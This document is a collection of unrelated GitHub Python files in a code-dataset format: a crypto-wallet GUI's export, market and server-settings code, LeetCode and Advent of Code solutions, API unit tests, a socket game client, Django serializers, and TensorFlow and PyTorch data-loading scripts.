'RXWqisAoJKEGVyXj46Zo3fDZnZTwQA6kQE'\n message_box = self.custom_message(self.tr('Support the team to export'),\n self.tr('You are about to send 5 MCL to Marmara Team'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoaddress = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [team_address, 5]\n self.worker_thread(self.thread_sendtoaddress, self.worker_sendtoaddress, method, params,\n self.export_table_to_csv)\n\n if message_box == 
QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n else:\n self.bottom_info(self.tr('Table has no data to export'))\n logging.info('Table has no data to export')\n\n @pyqtSlot(tuple)\n def export_table_to_csv(self, txid):\n if txid[0]:\n logging.info(txid[0])\n self.bottom_info('txid : ' + str(txid[0]).replace('\\n', ''))\n earnings_data = self.get_table_datas(self.earning_stats_tableWidget)\n self.export_as_csv_file(earnings_data)\n if txid[1]:\n self.bottom_err_info(txid[1])\n\n def export_as_csv_file(self, export_data):\n strt_date = str(self.earning_start_dateTimeEdit.dateTime().date().toString(QtCore.Qt.ISODate))\n stp_date = str(self.earning_stop_dateTimeEdit.dateTime().date().toString(QtCore.Qt.ISODate))\n if platform.system() == 'Linux':\n destination_path = str(pathlib.Path.home()) + '/Documents'\n csv_name = '/earning-stats_' + strt_date + '_' + stp_date + '.csv'\n if platform.system() == 'Win64' or platform.system() == 'Windows':\n destination_path = str(pathlib.Path.home()) + '\\Documents'\n csv_name = '\\earning-stats_' + strt_date + '_' + stp_date + '.csv'\n\n filename = QFileDialog.getExistingDirectory(self, 'Choose Location to save csv file', str(destination_path))\n configuration.export_as_scv(filename + csv_name, export_data)\n\n def get_table_datas(self, table):\n col_cnt = table.columnCount()\n table_data = []\n Header = []\n for col_no in range(col_cnt):\n Header.append(table.horizontalHeaderItem(col_no).text())\n table_data.append(Header)\n row_cnt = table.rowCount()\n if row_cnt > 0:\n for row_no in range(row_cnt):\n row_data = []\n for col_no in range(col_cnt):\n data = table.item(row_no, col_no).text()\n row_data.append(data)\n table_data.append(row_data)\n return table_data\n\n # -----------------\n # Market Page\n # -----------------\n\n def update_exchange_market_combobox(self):\n self.exchange_market_comboBox.clear()\n api_list = api_request.exchange_market_api_list\n for item in api_list:\n self.exchange_market_comboBox.addItem(str(item))\n\n @pyqtSlot()\n def get_mcl_exchange_market(self):\n self.exchange_market_request_button.setEnabled(False)\n QtCore.QTimer.singleShot(20000, self.enable_market_request) # after 20 second it will enable button\n index = self.exchange_market_comboBox.currentIndex()\n key = self.exchange_market_comboBox.itemText(index)\n self.mcl_exchange_worker = marmarachain_rpc.ApiWorker()\n self.mcl_exchange_worker.set_api_key(key)\n self.mcl_exchange_worker.moveToThread(self.thread_api_exchange_request)\n self.mcl_exchange_worker.finished.connect(self.thread_api_exchange_request.quit)\n self.thread_api_exchange_request.started.connect(self.mcl_exchange_worker.exchange_api_run)\n self.thread_api_exchange_request.start()\n self.mcl_exchange_worker.out_list.connect(self.set_mcl_exchange_market_result)\n # self.mcl_exchange_worker.out_err.connect(self.err_mcl_exchange_market_result)\n\n @pyqtSlot(list)\n def set_mcl_exchange_market_result(self, out_list):\n out_json = out_list[0]\n if type(out_json) is list:\n self.mcl_exchange_market_result = out_json\n self.update_exchange_table()\n if type(out_json) is str:\n if out_json == 'error':\n self.bottom_err_info(self.tr('Error in getting exchange values'))\n if out_list[1]:\n if type(out_list[1]) is dict:\n self.mcl_exchange_ticker_result = out_list[1]\n self.update_ticker_table()\n if type(out_list[1]) is str:\n if out_list[1] == 'error':\n self.bottom_err_info(self.tr('Error in getting exchange values'))\n\n def 
update_exchange_table(self):\n self.exchange_market_tableWidget.setRowCount(len(self.mcl_exchange_market_result))\n self.exchange_market_tableWidget.setSortingEnabled(False)\n fiat = self.market_fiat_comboBox.currentText()\n for row in self.mcl_exchange_market_result:\n price = ('%.8f' % row.get('quotes').get(fiat).get('price'))\n volume = ('%.8f' % row.get('quotes').get(fiat).get('volume_24h'))\n row_number = self.mcl_exchange_market_result.index(row)\n self.exchange_market_tableWidget.setItem(row_number, 0, QTableWidgetItem(str(row.get('exchange_name'))))\n self.exchange_market_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row.get('pair'))))\n self.exchange_market_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(price)))\n self.exchange_market_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(volume)))\n self.exchange_market_tableWidget.setItem(row_number, 4, QTableWidgetItem(\n str(row.get('last_updated')).replace('T', ' ').replace('Z', '')))\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.exchange_market_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n self.bottom_info(self.tr('fetched exchange values'))\n self.exchange_market_tableWidget.setSortingEnabled(True)\n\n def update_ticker_table(self):\n fiat = self.market_fiat_comboBox.currentText()\n price = ('%.8f' % self.mcl_exchange_ticker_result.get(fiat).get('price'))\n volume = ('%.8f' % self.mcl_exchange_ticker_result.get(fiat).get('volume_24h'))\n self.ticker_price_label_value.setText(str(price))\n self.ticker_volume_label_value.setText(str(volume))\n self.ticker_1hour_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_1h')))\n self.ticker_24hour_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_24h')))\n self.ticker_1week_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_7d')))\n self.ticker_1month_label_value.setText(\n str(self.mcl_exchange_ticker_result.get(fiat).get('percent_change_30d')))\n if self.ticker_price_label_value.text():\n self.mcl_amount_lineEdit.setEnabled(True)\n self.usd_amount_lineEdit.setEnabled(True)\n\n @pyqtSlot()\n def market_fiat_changed(self):\n self.convert_usd_label.setText(self.market_fiat_comboBox.currentText())\n self.calculate_usd_price()\n if self.mcl_exchange_market_result and self.mcl_exchange_ticker_result:\n self.update_exchange_table()\n self.update_ticker_table()\n\n @pyqtSlot()\n def calculate_usd_price(self):\n if self.mcl_amount_lineEdit.text():\n current_fiat = self.market_fiat_comboBox.currentText()\n price = float(self.mcl_exchange_ticker_result.get(current_fiat).get('price'))\n calculation = float(self.mcl_amount_lineEdit.text()) * price\n self.usd_amount_lineEdit.setText(str('%.8f' % calculation))\n\n @pyqtSlot()\n def calculate_mcl_price(self):\n if self.usd_amount_lineEdit.text():\n current_fiat = self.market_fiat_comboBox.currentText()\n price = float(self.mcl_exchange_ticker_result.get(current_fiat).get('price'))\n calculation = float(self.usd_amount_lineEdit.text()) / price\n self.mcl_amount_lineEdit.setText(str('%.8f' % 
calculation))\n\n @pyqtSlot()\n def enable_market_request(self):\n self.exchange_market_request_button.setEnabled(True)\n\n # -------------------------------------------------------------------\n # Remote Host adding , editing, deleting and saving in conf file\n # --------------------------------------------------------------------\n @pyqtSlot()\n def server_add_selected(self):\n self.login_stackedWidget.setCurrentIndex(2)\n\n @pyqtSlot()\n def add_cancel_selected(self):\n self.add_servername_lineEdit.setText(\"\")\n self.add_serverusername_lineEdit.setText(\"\")\n self.add_serverip_lineEdit.setText(\"\")\n self.remote_selection()\n\n @pyqtSlot()\n def server_edit_selected(self):\n self.login_stackedWidget.setCurrentIndex(3)\n server_list = configuration.ServerSettings().read_file()\n selected_server_info = server_list[self.server_comboBox.currentIndex()]\n selected_server_info = selected_server_info.split(\",\")\n self.edit_servername_lineEdit.setText(selected_server_info[0])\n self.edit_serverusername_lineEdit.setText(selected_server_info[1])\n self.edit_serverip_lineEdit.setText(selected_server_info[2])\n\n @pyqtSlot()\n def enable_ssh_custom_port(self):\n if self.ssh_port_checkBox.isChecked():\n self.ssh_port_lineEdit.setEnabled(True)\n else:\n self.ssh_port_lineEdit.setEnabled(False)\n self.ssh_port_lineEdit.setText('22')\n\n @pyqtSlot()\n def save_server_settings(self):\n if self.add_servername_lineEdit.text() != \"\" and self.add_serverusername_lineEdit.text() != \"\" and self.add_serverip_lineEdit.text() != \"\":\n configuration.ServerSettings().save_file(server_name=self.add_servername_lineEdit.text(),\n server_username=self.add_serverusername_lineEdit.text(),\n server_ip=self.add_serverip_lineEdit.text())\n self.add_servername_lineEdit.setText(\"\")\n self.add_serverusername_lineEdit.setText(\"\")\n self.add_serverip_lineEdit.setText(\"\")\n # self.get_server_combobox_names()\n # self.login_stackedWidget.setCurrentIndex(1)\n self.remote_selection()\n else:\n self.login_message_label.setText(self.tr('please insert all values'))\n\n def get_server_combobox_names(self):\n server_name_list = []\n server_settings_list = configuration.ServerSettings().read_file()\n self.server_comboBox.clear()\n for setting_list in server_settings_list:\n server_name_list.append(setting_list.split(\",\")[0])\n self.server_comboBox.addItems(server_name_list)\n\n @pyqtSlot()\n def edit_server_settings(self):\n if self.edit_servername_lineEdit.text() != \"\" and self.edit_serverusername_lineEdit.text() != \"\" and self.edit_serverip_lineEdit.text() != \"\":\n server_list = configuration.ServerSettings().read_file()\n del server_list[self.server_comboBox.currentIndex()]\n configuration.ServerSettings().delete_record(server_list)\n configuration.ServerSettings().save_file(server_name=self.edit_servername_lineEdit.text(),\n server_username=self.edit_serverusername_lineEdit.text(),\n server_ip=self.edit_serverip_lineEdit.text())\n self.login_stackedWidget.setCurrentIndex(1)\n self.edit_servername_lineEdit.setText(\"\")\n self.edit_serverusername_lineEdit.setText(\"\")\n self.edit_serverip_lineEdit.setText(\"\")\n self.get_server_combobox_names()\n self.login_stackedWidget.setCurrentIndex(1)\n else:\n self.login_message_label.setText(self.tr('please insert all values'))\n\n @pyqtSlot()\n def delete_server_setting(self):\n server_list = configuration.ServerSettings().read_file()\n del server_list[self.server_comboBox.currentIndex()]\n configuration.ServerSettings().delete_record(server_list)\n 
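# Editor's note: deleting by self.server_comboBox.currentIndex() assumes the
# combo box rows stay in the same order as the lines returned by
# configuration.ServerSettings().read_file(). get_server_combobox_names()
# rebuilds the combo box from that file in order, which preserves the
# invariant; re-check this if the combo box ever gets sorted.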
self.remote_selection()\n\n\nif __name__ == '__main__':\n appctxt = ApplicationContext()\n ui = MarmaraMain()\n ui.show()\n exit_code = appctxt.app.exec_()\n sys.exit(exit_code)\n","repo_name":"marmarachain/marmara-connector","sub_path":"src/main/python/mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":177409,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"42995876728","text":"#Solution 1\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# r = [2,7,11,15]\n\n# for i in range(len(nums)):\n# temp = target - nums[i]\n# if temp in r:\n# return [i,nums.index(temp)]\n\n# r.append(nums[i]) \n\n\n\n# Solution 2\nclass Solution:\n def twoSum(self, nums, target):\n ls = []\n for i in range(0, len(nums)):\n item = target - nums[i]\n nums[i] = \"done\"\n if item in nums:\n ls.append(i)\n ls.append(nums.index(item))\n return ls","repo_name":"btranscend/python-algorithms","sub_path":"twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"66691277","text":"from functools import reduce\nfrom typing import List\nfrom collections import Counter\nimport sys\n\n\ndef twoSum(nums: List[int], target: int) -> List[int]:\n sub_to_index = {target - v: i for i, v in enumerate(nums)}\n for num in nums:\n if num in sub_to_index and sub_to_index[num] != nums.index(num):\n return [nums.index(num), sub_to_index[num]]\n\n\nprint(twoSum([3, 2, 4], 6))\n\n\ndef decompressRLElist(nums: List[int]) -> List[int]:\n return reduce(lambda a, b: a + b, [[tpl[1]] * tpl[0] for tpl in [nums[i:i + 2] for i in range(0, len(nums), 2)]])\n\n\nprint(decompressRLElist([1, 2, 3, 4]))\n\n\ndef findNumbers2(nums: List[int]) -> int:\n result = 0\n for num in nums:\n if len(str(num)) % 2 == 0:\n result += 1\n\n return result\n\n\ndef findNumbers(nums: List[int]) -> int:\n result = 0\n for num in (num for num in nums if len(str(num)) % 2 == 0):\n result += 1\n\n return result\n\n\nprint(findNumbers([12, 345, 2, 6, 7896]))\n\n\ndef sumZero(n: int) -> List[int]:\n res = []\n if n % 2 != 0:\n res.append(0)\n for i in range(1, n // 2 + 1):\n res.append(i)\n res.append(-i)\n\n return res\n\n\nprint(sumZero(5))\n\n\ndef sortedSquares(A: List[int]) -> List[int]:\n return [x ** 2 for x in sorted(A, key=lambda x: abs(x))]\n\n\nprint(sortedSquares([-4, -1, 0, 3, 10]))\n\n\ndef countCharacters(words: List[str], chars: str) -> int:\n res = 0\n ref = Counter(chars)\n for word in words:\n if not Counter(word) - ref:\n res += len(word)\n\n return res\n\n\nprint(countCharacters([\"ccat\", \"bt\", \"hat\", \"tree\"], \"atach\"))\n\n\ndef fib(N: int) -> int:\n a = 0\n if N == 0:\n return a\n b = 1\n if N == 1:\n return b\n\n res = 1\n for i in range(2, N+1):\n tmp = a\n a = b\n b += tmp\n res += tmp\n\n return res\n\n\nprint(fib(4))\n\n\ndef minCostToMoveChips(chips: List[int]) -> int:\n odd = 0\n even = 0\n\n for chip in chips:\n if chip % 2 == 0:\n even += 1\n else:\n odd += 1\n\n if even > odd:\n parity = True\n else:\n parity = False\n\n res = 0\n for chip in chips:\n if chip % 2 == 0 ^ parity:\n res += 1\n\n return res\n\n\nprint(minCostToMoveChips([2, 2, 2, 3, 3]))\n\n\ndef maxProfitSingle(prices: List[int]) -> int:\n if not prices:\n return 0\n\n min = sys.maxsize\n result = -sys.maxsize - 1\n for price in prices:\n if price < min:\n min = price\n if result < price - min:\n result = price - min\n\n return 
result\n\n\nprint(maxProfitSingle([7, 1, 5, 3, 6, 4]))\nprint(maxProfitSingle([7, 6, 4, 3, 1]))\n\n\ndef maxProfit(prices: List[int]) -> int:\n res = 0\n for tpl in [prices[i:i+2] for i in range(0, len(prices)-1)]:\n if tpl[0] < tpl[1]:\n res += tpl[1]-tpl[0]\n\n return res\n\n\nprint(maxProfit([7, 1, 5, 3, 6, 4]))\nprint(maxProfit([1, 2, 3, 4, 5]))\n","repo_name":"benoitantelme/pythonstuff","sub_path":"leetcode/easy/ArrayExercises.py","file_name":"ArrayExercises.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41633222141","text":"g1_seed = 634\ng1_factor = 16807\ng2_seed = 301\ng2_factor = 48271\ng_mod = 2147483647\nmask = (2**16) - 1\n\nmatches = 0\ng1_last = g1_seed\ng2_last = g2_seed\nfor _ in range(0, 5_000_000):\n\n while True: # Next G1\n g1_last = (g1_last * g1_factor) % g_mod\n if g1_last & (4-1) == 0:\n break\n\n while True: # Next G2\n g2_last = (g2_last * g2_factor) % g_mod\n if g2_last & (8-1) == 0:\n break\n\n if g1_last & mask == g2_last & mask:\n matches += 1\n print(matches)\n\nprint('Final Count:', matches) # = 294\n","repo_name":"AdamKinnell/AdventOfCode2017","sub_path":"day15/day15_b.py","file_name":"day15_b.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39799373942","text":"from unittest.mock import Mock\n\nimport pytest # type: ignore\n\nfrom knb.use_cases import list_notes\nfrom knb.use_cases import specs\nfrom knb.utils import factory\n\n\n# noinspection Mypy\n\n\n@pytest.fixture\ndef gateway() -> list_notes.IGateway:\n mock = Mock()\n mock.load_notes.return_value = [factory.create_note() for i in range(150)]\n return mock\n\n\n# noinspection PyUnresolvedReferences\ndef test_list_notes(gateway):\n uc = list_notes.UseCase(gateway)\n\n response: list_notes.Output = uc(list_notes.Input(user_id=\"1\", page=1))\n spec = specs.AuthorSpec(\"1\").and_spec(specs.PageSpec(1, 100))\n gateway.load_notes.assert_called_with(spec)\n assert not response.errors\n assert response.notes\n\n\n# noinspection PyUnresolvedReferences\ndef test_list_other_page(gateway):\n uc = list_notes.UseCase(gateway)\n\n response: list_notes.Output = uc(list_notes.Input(user_id=\"1\", page=2))\n spec = specs.AuthorSpec(\"1\").and_spec(specs.PageSpec(2, 100))\n gateway.load_notes.assert_called_with(spec)\n assert not response.errors\n assert response.notes\n\n\ndef test_list_my_notes(gateway):\n uc = list_notes.UseCase(gateway)\n input = list_notes.Input(\"1\", 1)\n result: list_notes.Output = uc(input)\n author_spec = specs.AuthorSpec(\"1\")\n page_spec = specs.PageSpec(1, 100)\n spec = author_spec.and_spec(page_spec)\n # noinspection PyUnresolvedReferences\n gateway.load_notes.assert_called_with(spec)\n","repo_name":"KnowNBase/core","sub_path":"knb/use_cases/tests/test_list_notes.py","file_name":"test_list_notes.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39289191113","text":"import socket\n\n# IPADDR = \"192.168.100.87\"\n\nIPADDR = \"127.0.0.1\"\nPORT = 1234\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((IPADDR, PORT))\n\ndef start_game(server, rounds):\n\n msg = \"\"\n\n while str(rounds) not in msg:\n choice = input(\"Your choice (Lizard, Rock, Paper, Scissors, Spock): \")\n server.send(bytearray(choice.encode(\"UTF-8\")))\n\n msg = 
server.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n msg = server.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n\nwhile True:\n\n msg = s.recv(2048).decode(\"UTF-8\")\n print(msg)\n\n if \"wait\" not in msg:\n\n option = 0\n while option != 1 and option != 2 and option != 3:\n try:\n option = int(input(\"Enter your option: \"))\n except:\n print(\"Invalid option! Option must be a number!\\n\")\n else:\n print(\"Invalid option!\")\n\n # if option == 3:\n # s.send(bytearray(str(option).encode(\"UTF-8\")))\n\n s.send(bytearray(str(option).encode(\"UTF-8\")))\n\n receivedMsg = s.recv(100).decode(\"UTF-8\")\n print(\"[server] \"+receivedMsg)\n\n if option == 1:\n start_game(s, 2)\n\n if option == 2:\n start_game(s, 3)\n\n if option == 3:\n msg = s.recv(2040).decode(\"UTF-8\")\n print(msg)\n break\n\n\n\ns.close()\n","repo_name":"StefanLungu/Rock-Paper-Scissors-Lizard-Spock","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41731638567","text":"\"\"\"\nDefinition of the :class:`SessionReadSerializer` and `SessionWriteSerializer`\nclasses.\n\"\"\"\nfrom typing import Tuple\n\nfrom django.urls import reverse\nfrom rest_framework import serializers\n\nfrom django_mri.models.irb_approval import IrbApproval\nfrom django_mri.models.session import Session\nfrom django_mri.serializers.irb_approval import IrbApprovalSerializer\nfrom django_mri.serializers.utils import (MiniGroupSerializer,\n MiniMeasurementSerializer,\n MiniSubjectSerializer)\nfrom django_mri.utils import get_measurement_model, get_subject_model\n\nMeasurement = get_measurement_model()\nSubject = get_subject_model()\n\nSESSION_SERIALIZER_FIELDS: Tuple[str] = (\n \"id\",\n \"subject\",\n \"comments\",\n \"time\",\n \"measurement\",\n \"irb\",\n)\nSESSION_READ_FIELDS: Tuple[str] = (\n \"dicom_zip\",\n \"nifti_zip\",\n \"n_scans\",\n \"study_groups\",\n)\nSESSION_WRITE_FIELDS: Tuple[str] = (\n \"subject_id\",\n \"measurement_id\",\n \"irb_id\",\n)\n\n\nclass SessionSerializer(serializers.ModelSerializer):\n measurement = MiniMeasurementSerializer()\n subject = serializers.PrimaryKeyRelatedField(read_only=True)\n irb = IrbApprovalSerializer()\n\n class Meta:\n model = Session\n fields = SESSION_SERIALIZER_FIELDS\n\n\nclass SessionReadSerializer(SessionSerializer):\n \"\"\"\n Serializer class for the :class:`~django_mri.models.session.Session` model.\n \"\"\"\n\n dicom_zip = serializers.SerializerMethodField()\n nifti_zip = serializers.SerializerMethodField()\n n_scans = serializers.SerializerMethodField()\n study_groups = MiniGroupSerializer(many=True)\n\n class Meta:\n model = Session\n fields = tuple(\n list(SESSION_SERIALIZER_FIELDS) + list(SESSION_READ_FIELDS)\n )\n\n def get_dicom_zip(self, instance: Session) -> str:\n return reverse(\"mri:session_dicom_zip\", args=(instance.id,))\n\n def get_nifti_zip(self, instance: Session) -> str:\n return reverse(\"mri:session_nifti_zip\", args=(instance.id,))\n\n def get_n_scans(self, instance: Session) -> int:\n return instance.scan_set.count()\n\n\nclass AdminSessionReadSerializer(SessionReadSerializer):\n subject = MiniSubjectSerializer()\n\n\nclass SessionWriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer class for the :class:`~django_mri.models.session.Session` model.\n \"\"\"\n\n measurement_id = serializers.PrimaryKeyRelatedField(\n queryset=Measurement.objects.all(), allow_null=True\n )\n subject_id = 
serializers.PrimaryKeyRelatedField(\n queryset=Subject.objects.all()\n )\n irb_id = serializers.PrimaryKeyRelatedField(\n queryset=IrbApproval.objects.all(), allow_null=True\n )\n\n class Meta:\n model = Session\n fields = tuple(\n list(SESSION_SERIALIZER_FIELDS) + list(SESSION_WRITE_FIELDS)\n )\n\n def update(self, instance, validated_data):\n if validated_data.get(\"irb\"):\n irb = validated_data.pop(\"irb\")\n irb_approval, _ = IrbApproval.objects.get_or_create(\n institution=irb[\"institution\"], number=irb[\"number\"]\n )\n validated_data[\"irb_id\"] = irb_approval.id\n super().update(instance, validated_data)\n return instance\n","repo_name":"TheLabbingProject/django_mri","sub_path":"django_mri/serializers/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"37755455335","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir)\n\nimport src.helpers as helpers\nimport src.loss as loss\nimport hyperparams\n\nimport argparse\nimport os\nimport sys\n\nimport tensorflow as tf\nimport numpy as np\n\nimport hyperparams\nimport src.data as d\nimport src.model as models\n\nimport tensorflow as tf\nimport src.model as models\nimport src.data as d\nimport src.metrics as metrics\nimport src.training as training\nimport src.loss as loss\nimport src.visual as vis\nimport hyperparams\nimport numpy as np\nimport src.helpers as helpers\nimport time\nimport util\n\nFLAGS = None\nnccnet = True\n\npathset = [ (120,9900, 11000), (20, 9900, 11000),\n (60, 16000, 17000),(70, 16000, 17000),\n (400, 8500, 27000),(400, 7000, 27000),\n (300, 7000, 21500),(151, 4500, 5000),\n (51, 18000, 9500), (52, 18000, 7500),\n (55, 18000, 7500), (60, 18100, 8400)]\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef convert_to(data, hparams, num_examples, name):\n \"\"\"Converts a dataset to tfrecords.\"\"\"\n\n s_rows = hparams.in_source_width\n t_rows = hparams.in_template_width\n\n filename = os.path.join(hparams.data_dir, name + '.tfrecords')\n\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n\n if nccnet:\n model = models.create_model(hparams, data, train = False)\n sess = model.sess\n g = model\n\n else: #Simple NCC\n sess = tf.Session()\n model = models.Graph()\n\n model.image = tf.placeholder(tf.float32, shape=[hparams.in_source_width,hparams.in_source_width])\n model.template = tf.placeholder(tf.float32, shape=[hparams.in_template_width,hparams.in_template_width])\n\n search_dim = tf.expand_dims(tf.expand_dims(search, dim=0), dim=3)\n template_dim = tf.expand_dims(tf.expand_dims(template, dim=0), dim=3)\n\n model.source_alpha = [search_dim]\n model.template_alpha = [template_dim]\n model.similar = tf.constant(np.ones((8)))\n\n model = models.normxcorr(g, hparams)\n model = loss.loss(g, hparams)\n\n index = 0\n while(index < num_examples):\n\n if nccnet:\n t, s = data.getBatch(hparams)\n else:\n t, s = data.getSample([t_rows, t_rows], [s_rows, s_rows], hparams.resize, data.metadata)\n\n ct = hparams.in_template_width/2-hparams.template_width/2\n st = 
hparams.in_source_width/2-hparams.source_width/2\n\n t_cropped = t[:, int(ct):int(ct+hparams.template_width), int(ct):int(ct+hparams.template_width)]\n s_cropped = s[:, int(st):int(st+hparams.source_width), int(st):int(st+hparams.source_width)]\n\n results = sess.run(model.full_loss, feed_dict={model.template: t_cropped, model.image: s_cropped, model.similar: np.ones((8))})\n\n for i in range(8):\n result = results[i,0,0,0]\n print(result)\n if(result> -0.14) or result<-0.90:\n print('done', index)\n\n search_raw = np.asarray(s[i]*255, dtype=np.uint8).tostring()\n temp_raw = np.asarray(t[i]*255, dtype=np.uint8).tostring()\n\n ex = tf.train.Example(features=tf.train.Features(feature={\n 'search_raw': _bytes_feature(search_raw),\n 'template_raw': _bytes_feature(temp_raw),}))\n\n writer.write(ex.SerializeToString())\n index += 1\n writer.close()\n\n\ndef main(unused_argv):\n # Get the data.\n hparams = hyperparams.create_hparams()\n data = d.Data(hparams, prepare = True )\n\n # Convert to Examples and write the result to TFRecords.\n convert_to(data, hparams, 1000, 'hardest_examples')\n #convert_to(data, hparams, 1000, 'validation_1K')\n #convert_to(data, hparams, 1000, 'test_1K')\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"inference/prepare_harder_data.py","file_name":"prepare_harder_data.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11647466773","text":"\"\"\"Unit tests for Combatant API.\"\"\"\n\nimport json\nimport pytest\n\n\ndef test_create_anonymous(app, combatant_data):\n \"\"\"Test create user as anonymous.\"\"\"\n client = app.test_client()\n response = client.post('/api/combatant', data=combatant_data)\n assert response.status_code == 401\n\n\ndef test_create_admin(app, admin_user, login_client, combatant_data):\n \"\"\"Test create and delete user vi API as admin.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n\n assert response.status_code == 200\n uuid = response.json.get('uuid')\n assert uuid is not None\n\n response = login_client.delete('/api/combatant/{0}'.format(uuid))\n assert response.status_code == 200\n\n\ndef test_create_unprivileged(unprivileged_user, login_client, combatant_data):\n \"\"\"Test create user as with a valid but unprivileged user.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n assert response.status_code == 401\n\n\n@pytest.mark.parametrize(\n 'privileged_user',\n [{None: ['edit_combatant_info']}],\n indirect=True\n)\ndef test_create_authorized(app, privileged_user, login_client, combatant_data, ):\n \"\"\"Test create user as with a valid and privileged user.\"\"\"\n response = login_client.post(\n '/api/combatant',\n data=json.dumps(combatant_data),\n content_type = 'application/json'\n )\n assert response.status_code == 200\n uuid = response.json.get('uuid')\n assert uuid is not None\n\n response = login_client.delete('/api/combatant/{0}'.format(uuid))\n assert response.status_code == 200\n\n","repo_name":"lrt512/eMoL_flask","sub_path":"emol/emol/api/tests/test_combatant_api.py","file_name":"test_combatant_api.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9679578321","text":"import 
torch\nfrom torch.utils.data import Dataset , DataLoader\nimport os\nfrom PIL import Image\nimport json\nfrom param import args\nimport numpy as np\nfrom transformers import AutoTokenizer\nfrom transformers import AutoFeatureExtractor\n\n\nclass FlickrDataset(Dataset):\n \"\"\"\n 对Flickr30k中读取到的数据进行预处理并打包为Dataset类型\n \"\"\"\n def __init__(self , root , json_path , split):\n self.root = root\n self.dataset = json.load(open(json_path , 'r'))['images']\n self.ids = []\n for idx , dataItem in enumerate(self.dataset):\n if dataItem['split'] == split:\n self.ids += [(idx , capIdx) for capIdx in range(len(dataItem['sentences']))] # 一张图片形成5个图文对\n # [(i , x0) , (i , x1) , (i , x2) , (i , x3) , (i , x4)]\n \n def __getitem__(self , index):\n \"\"\"\n 根据索引,从dataset中抽取对应元素的张量数据,为collate_fn服务\n \"\"\"\n pair_id = self.ids[index]\n img_id = pair_id[0]\n caption = self.dataset[img_id]['sentences'][pair_id[1]]['raw']\n\n img_path = self.dataset[img_id]['filename']\n image = Image.open(os.path.join(self.root , img_path)).convert('RGB')\n\n return image , caption , index\n \n def __len__(self):\n return len(self.ids)\n \ndef collate_fn(data):\n \"\"\"\n 为DataLoader服务,将从Dataset中抓取的数据进行打包\n \"\"\"\n images , captions , ids = zip(*data)\n \n # 处理图像\n image_processor = AutoFeatureExtractor.from_pretrained(\"facebook/vit-msn-small\")\n images = image_processor(images , return_tensors=\"pt\")\n images = images['pixel_values']\n # 处理文本\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n lengths = [len(cap.split()) for cap in captions]\n captions = tokenizer(\n captions,\n padding=True,\n truncation=True,\n return_tensors=\"pt\",\n max_length=max(lengths)\n )\n \n return images , captions , lengths , list(ids)\n\ndef FlickrDataLoader(split , root , json_path , batch_size , shuffle , num_workers , collate_fn=collate_fn):\n \"\"\"\n 获取DataLoader\n \"\"\"\n dataset = FlickrDataset(root , json_path , split)\n data_loader = DataLoader(\n dataset = dataset,\n batch_size = batch_size,\n shuffle = shuffle, \n num_workers = num_workers, \n collate_fn = collate_fn\n )\n return data_loader 